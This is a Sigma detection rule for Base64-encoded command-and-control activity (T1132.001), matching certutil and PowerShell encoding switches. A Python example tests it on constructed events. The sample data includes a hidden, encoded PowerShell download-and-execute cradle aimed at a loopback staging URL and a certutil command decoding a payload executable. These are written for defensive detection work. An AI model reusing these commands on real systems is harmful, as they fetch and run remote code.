title: Standard Encoding (T1132.001)
id: df00tech-t1132-001
status: experimental
description: "Adversaries may encode data with a standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system that adheres to existing protocol specifications. Common data encoding schemes include ASCII, Unicode, hexadecimal, Base64, and MIME. Some data encoding systems may also result in data compression, such as gzip. Malware families including SideTwist, Fysbis, Latrodectus, SeaDuke, Chaes, and Flagpro have all used Base64-encoded C2 traffic. This rule does not inspect network traffic; it keys on the host-side artifacts of the technique, namely certutil and PowerShell command lines that encode or decode Base64 data, so it should be paired with network-layer inspection of the C2 channel itself."
references:
  - https://attack.mitre.org/techniques/T1132/001/
  - https://df00tech.com/detections/T1132.001
author: df00tech
date: 2026/04/18
tags:
  - attack.command_and_control
  - attack.t1132.001
# NOTE: logsource is auto-derived and may need adjustment for your environment
logsource:
  category: process_creation
  product: windows
detection:
  # The vendor logic could not be auto-translated; see the KQL/SPL query on df00tech for the full version.
  # The selections below are derived from the false-positive sources listed in this rule (certutil
  # encode/decode switches, PowerShell encoded commands and inline Base64 decoding) and are a
  # starting point to tune, not a verbatim copy of the vendor query.
  selection_certutil:
    Image|endswith: '\certutil.exe'
    CommandLine|contains:
      - '-encode'
      - '-decode'
      - '-decodehex'
  selection_powershell:
    Image|endswith:
      - '\powershell.exe'
      - '\pwsh.exe'
    CommandLine|contains:
      - '-EncodedCommand'
      - '-enc '
      - '-ec '
      - 'FromBase64String'
  condition: 1 of selection_*
falsepositives:
  - Legitimate PowerShell scripts that decode Base64-encoded configuration data or credentials from secure vaults
  - certutil used by IT teams for certificate management and legitimate file encoding/decoding tasks
  - Software installers and package managers that use Base64-encoded embedded payloads during installation
  - Log management and SIEM agents that Base64-encode collected data before transmission to central servers
  - Web application developers testing encoding/decoding functions locally
level: medium
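Worked example, added here and not part of the df00tech rule or the Sigma project: the rule's two process-creation selections expressed in Python and run over constructed Sysmon-style events, followed by recovery of the script hidden behind -EncodedCommand. The event records, the 127.0.0.1 staging URL and the helper names (matches, decode_encoded_command, triage) are this example's own assumptions. The decoder shows the check a practitioner wants when triaging a hit: PowerShell's encoded argument is Base64 over UTF-16LE text, so decoding it as UTF-8 (or feeding it a Base64 string of odd byte length) does not yield the script.

```python
"""Run the T1132.001 process_creation selections over sample events.

Added example; the events below are constructed Sysmon-like process
creation records, not real telemetry, and the matching helpers are a
hand-written stand-in for the Sigma modifiers, not Sigma itself.
"""
import base64
import binascii
import re
from typing import List, Optional, Tuple

# Mirrors the rule's selections. Sigma's |endswith and |contains are
# case-insensitive, so everything is lower-cased before comparison.
CERTUTIL_SWITCHES = ("-encode", "-decode", "-decodehex")
POWERSHELL_IMAGES = ("\\powershell.exe", "\\pwsh.exe")
POWERSHELL_MARKERS = ("-encodedcommand", "-enc ", "-ec ", "frombase64string")

# PowerShell accepts any unambiguous prefix of -EncodedCommand; capture the
# Base64 token that follows it.
_ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def matches(event: dict) -> Optional[str]:
    """Return the name of the selection the event satisfies, or None."""
    image = event.get("Image", "").lower()
    cmd = event.get("CommandLine", "").lower()
    if image.endswith("\\certutil.exe") and any(s in cmd for s in CERTUTIL_SWITCHES):
        return "selection_certutil"
    if image.endswith(POWERSHELL_IMAGES) and any(m in cmd for m in POWERSHELL_MARKERS):
        return "selection_powershell"
    return None


def decode_encoded_command(cmd: str) -> Optional[str]:
    """Recover the script passed via -EncodedCommand.

    The argument is Base64 of the UTF-16LE script text, not UTF-8. Returns
    None when no encoded argument is present, the token is not valid Base64,
    or the decoded bytes are not valid UTF-16LE (e.g. odd length).
    """
    m = _ENC_RE.search(cmd)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
        return raw.decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def encode_for_powershell(script: str) -> str:
    """Encode a script the way PowerShell expects for -EncodedCommand."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def triage(events: List[dict]) -> List[Tuple[str, Optional[str]]]:
    """Return (selection, decoded script or None) for every event that fires."""
    hits = []
    for ev in events:
        sel = matches(ev)
        if sel:
            hits.append((sel, decode_encoded_command(ev.get("CommandLine", ""))))
    return hits


# Constructed sample script and events (assumption: loopback staging URL).
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://127.0.0.1:8080/stage')"
SAMPLE_EVENTS = [
    {"Image": "C:\\Windows\\System32\\certutil.exe",
     "CommandLine": "certutil -decode C:\\Users\\Public\\payload.txt C:\\Users\\Public\\payload.exe"},
    {"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -EncodedCommand " + encode_for_powershell(SAMPLE_SCRIPT)},
    {"Image": "C:\\Windows\\System32\\certutil.exe",
     "CommandLine": "certutil -verify -urlfetch cert.cer"},  # benign: no encode/decode switch
    {"Image": "C:\\Windows\\System32\\notepad.exe",
     "CommandLine": "notepad.exe notes.txt"},
]

if __name__ == "__main__":
    for selection, script in triage(SAMPLE_EVENTS):
        print(selection, "->", script if script is not None else "(no decodable -EncodedCommand)")
```

The certutil hit decodes to nothing because its payload lives in a file, not on the command line; the PowerShell hit is the case where decoding pays off, and the wrong-encoding path (a Base64 token that decodes to UTF-8 text of odd length) is reported as undecodable rather than as garbage.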
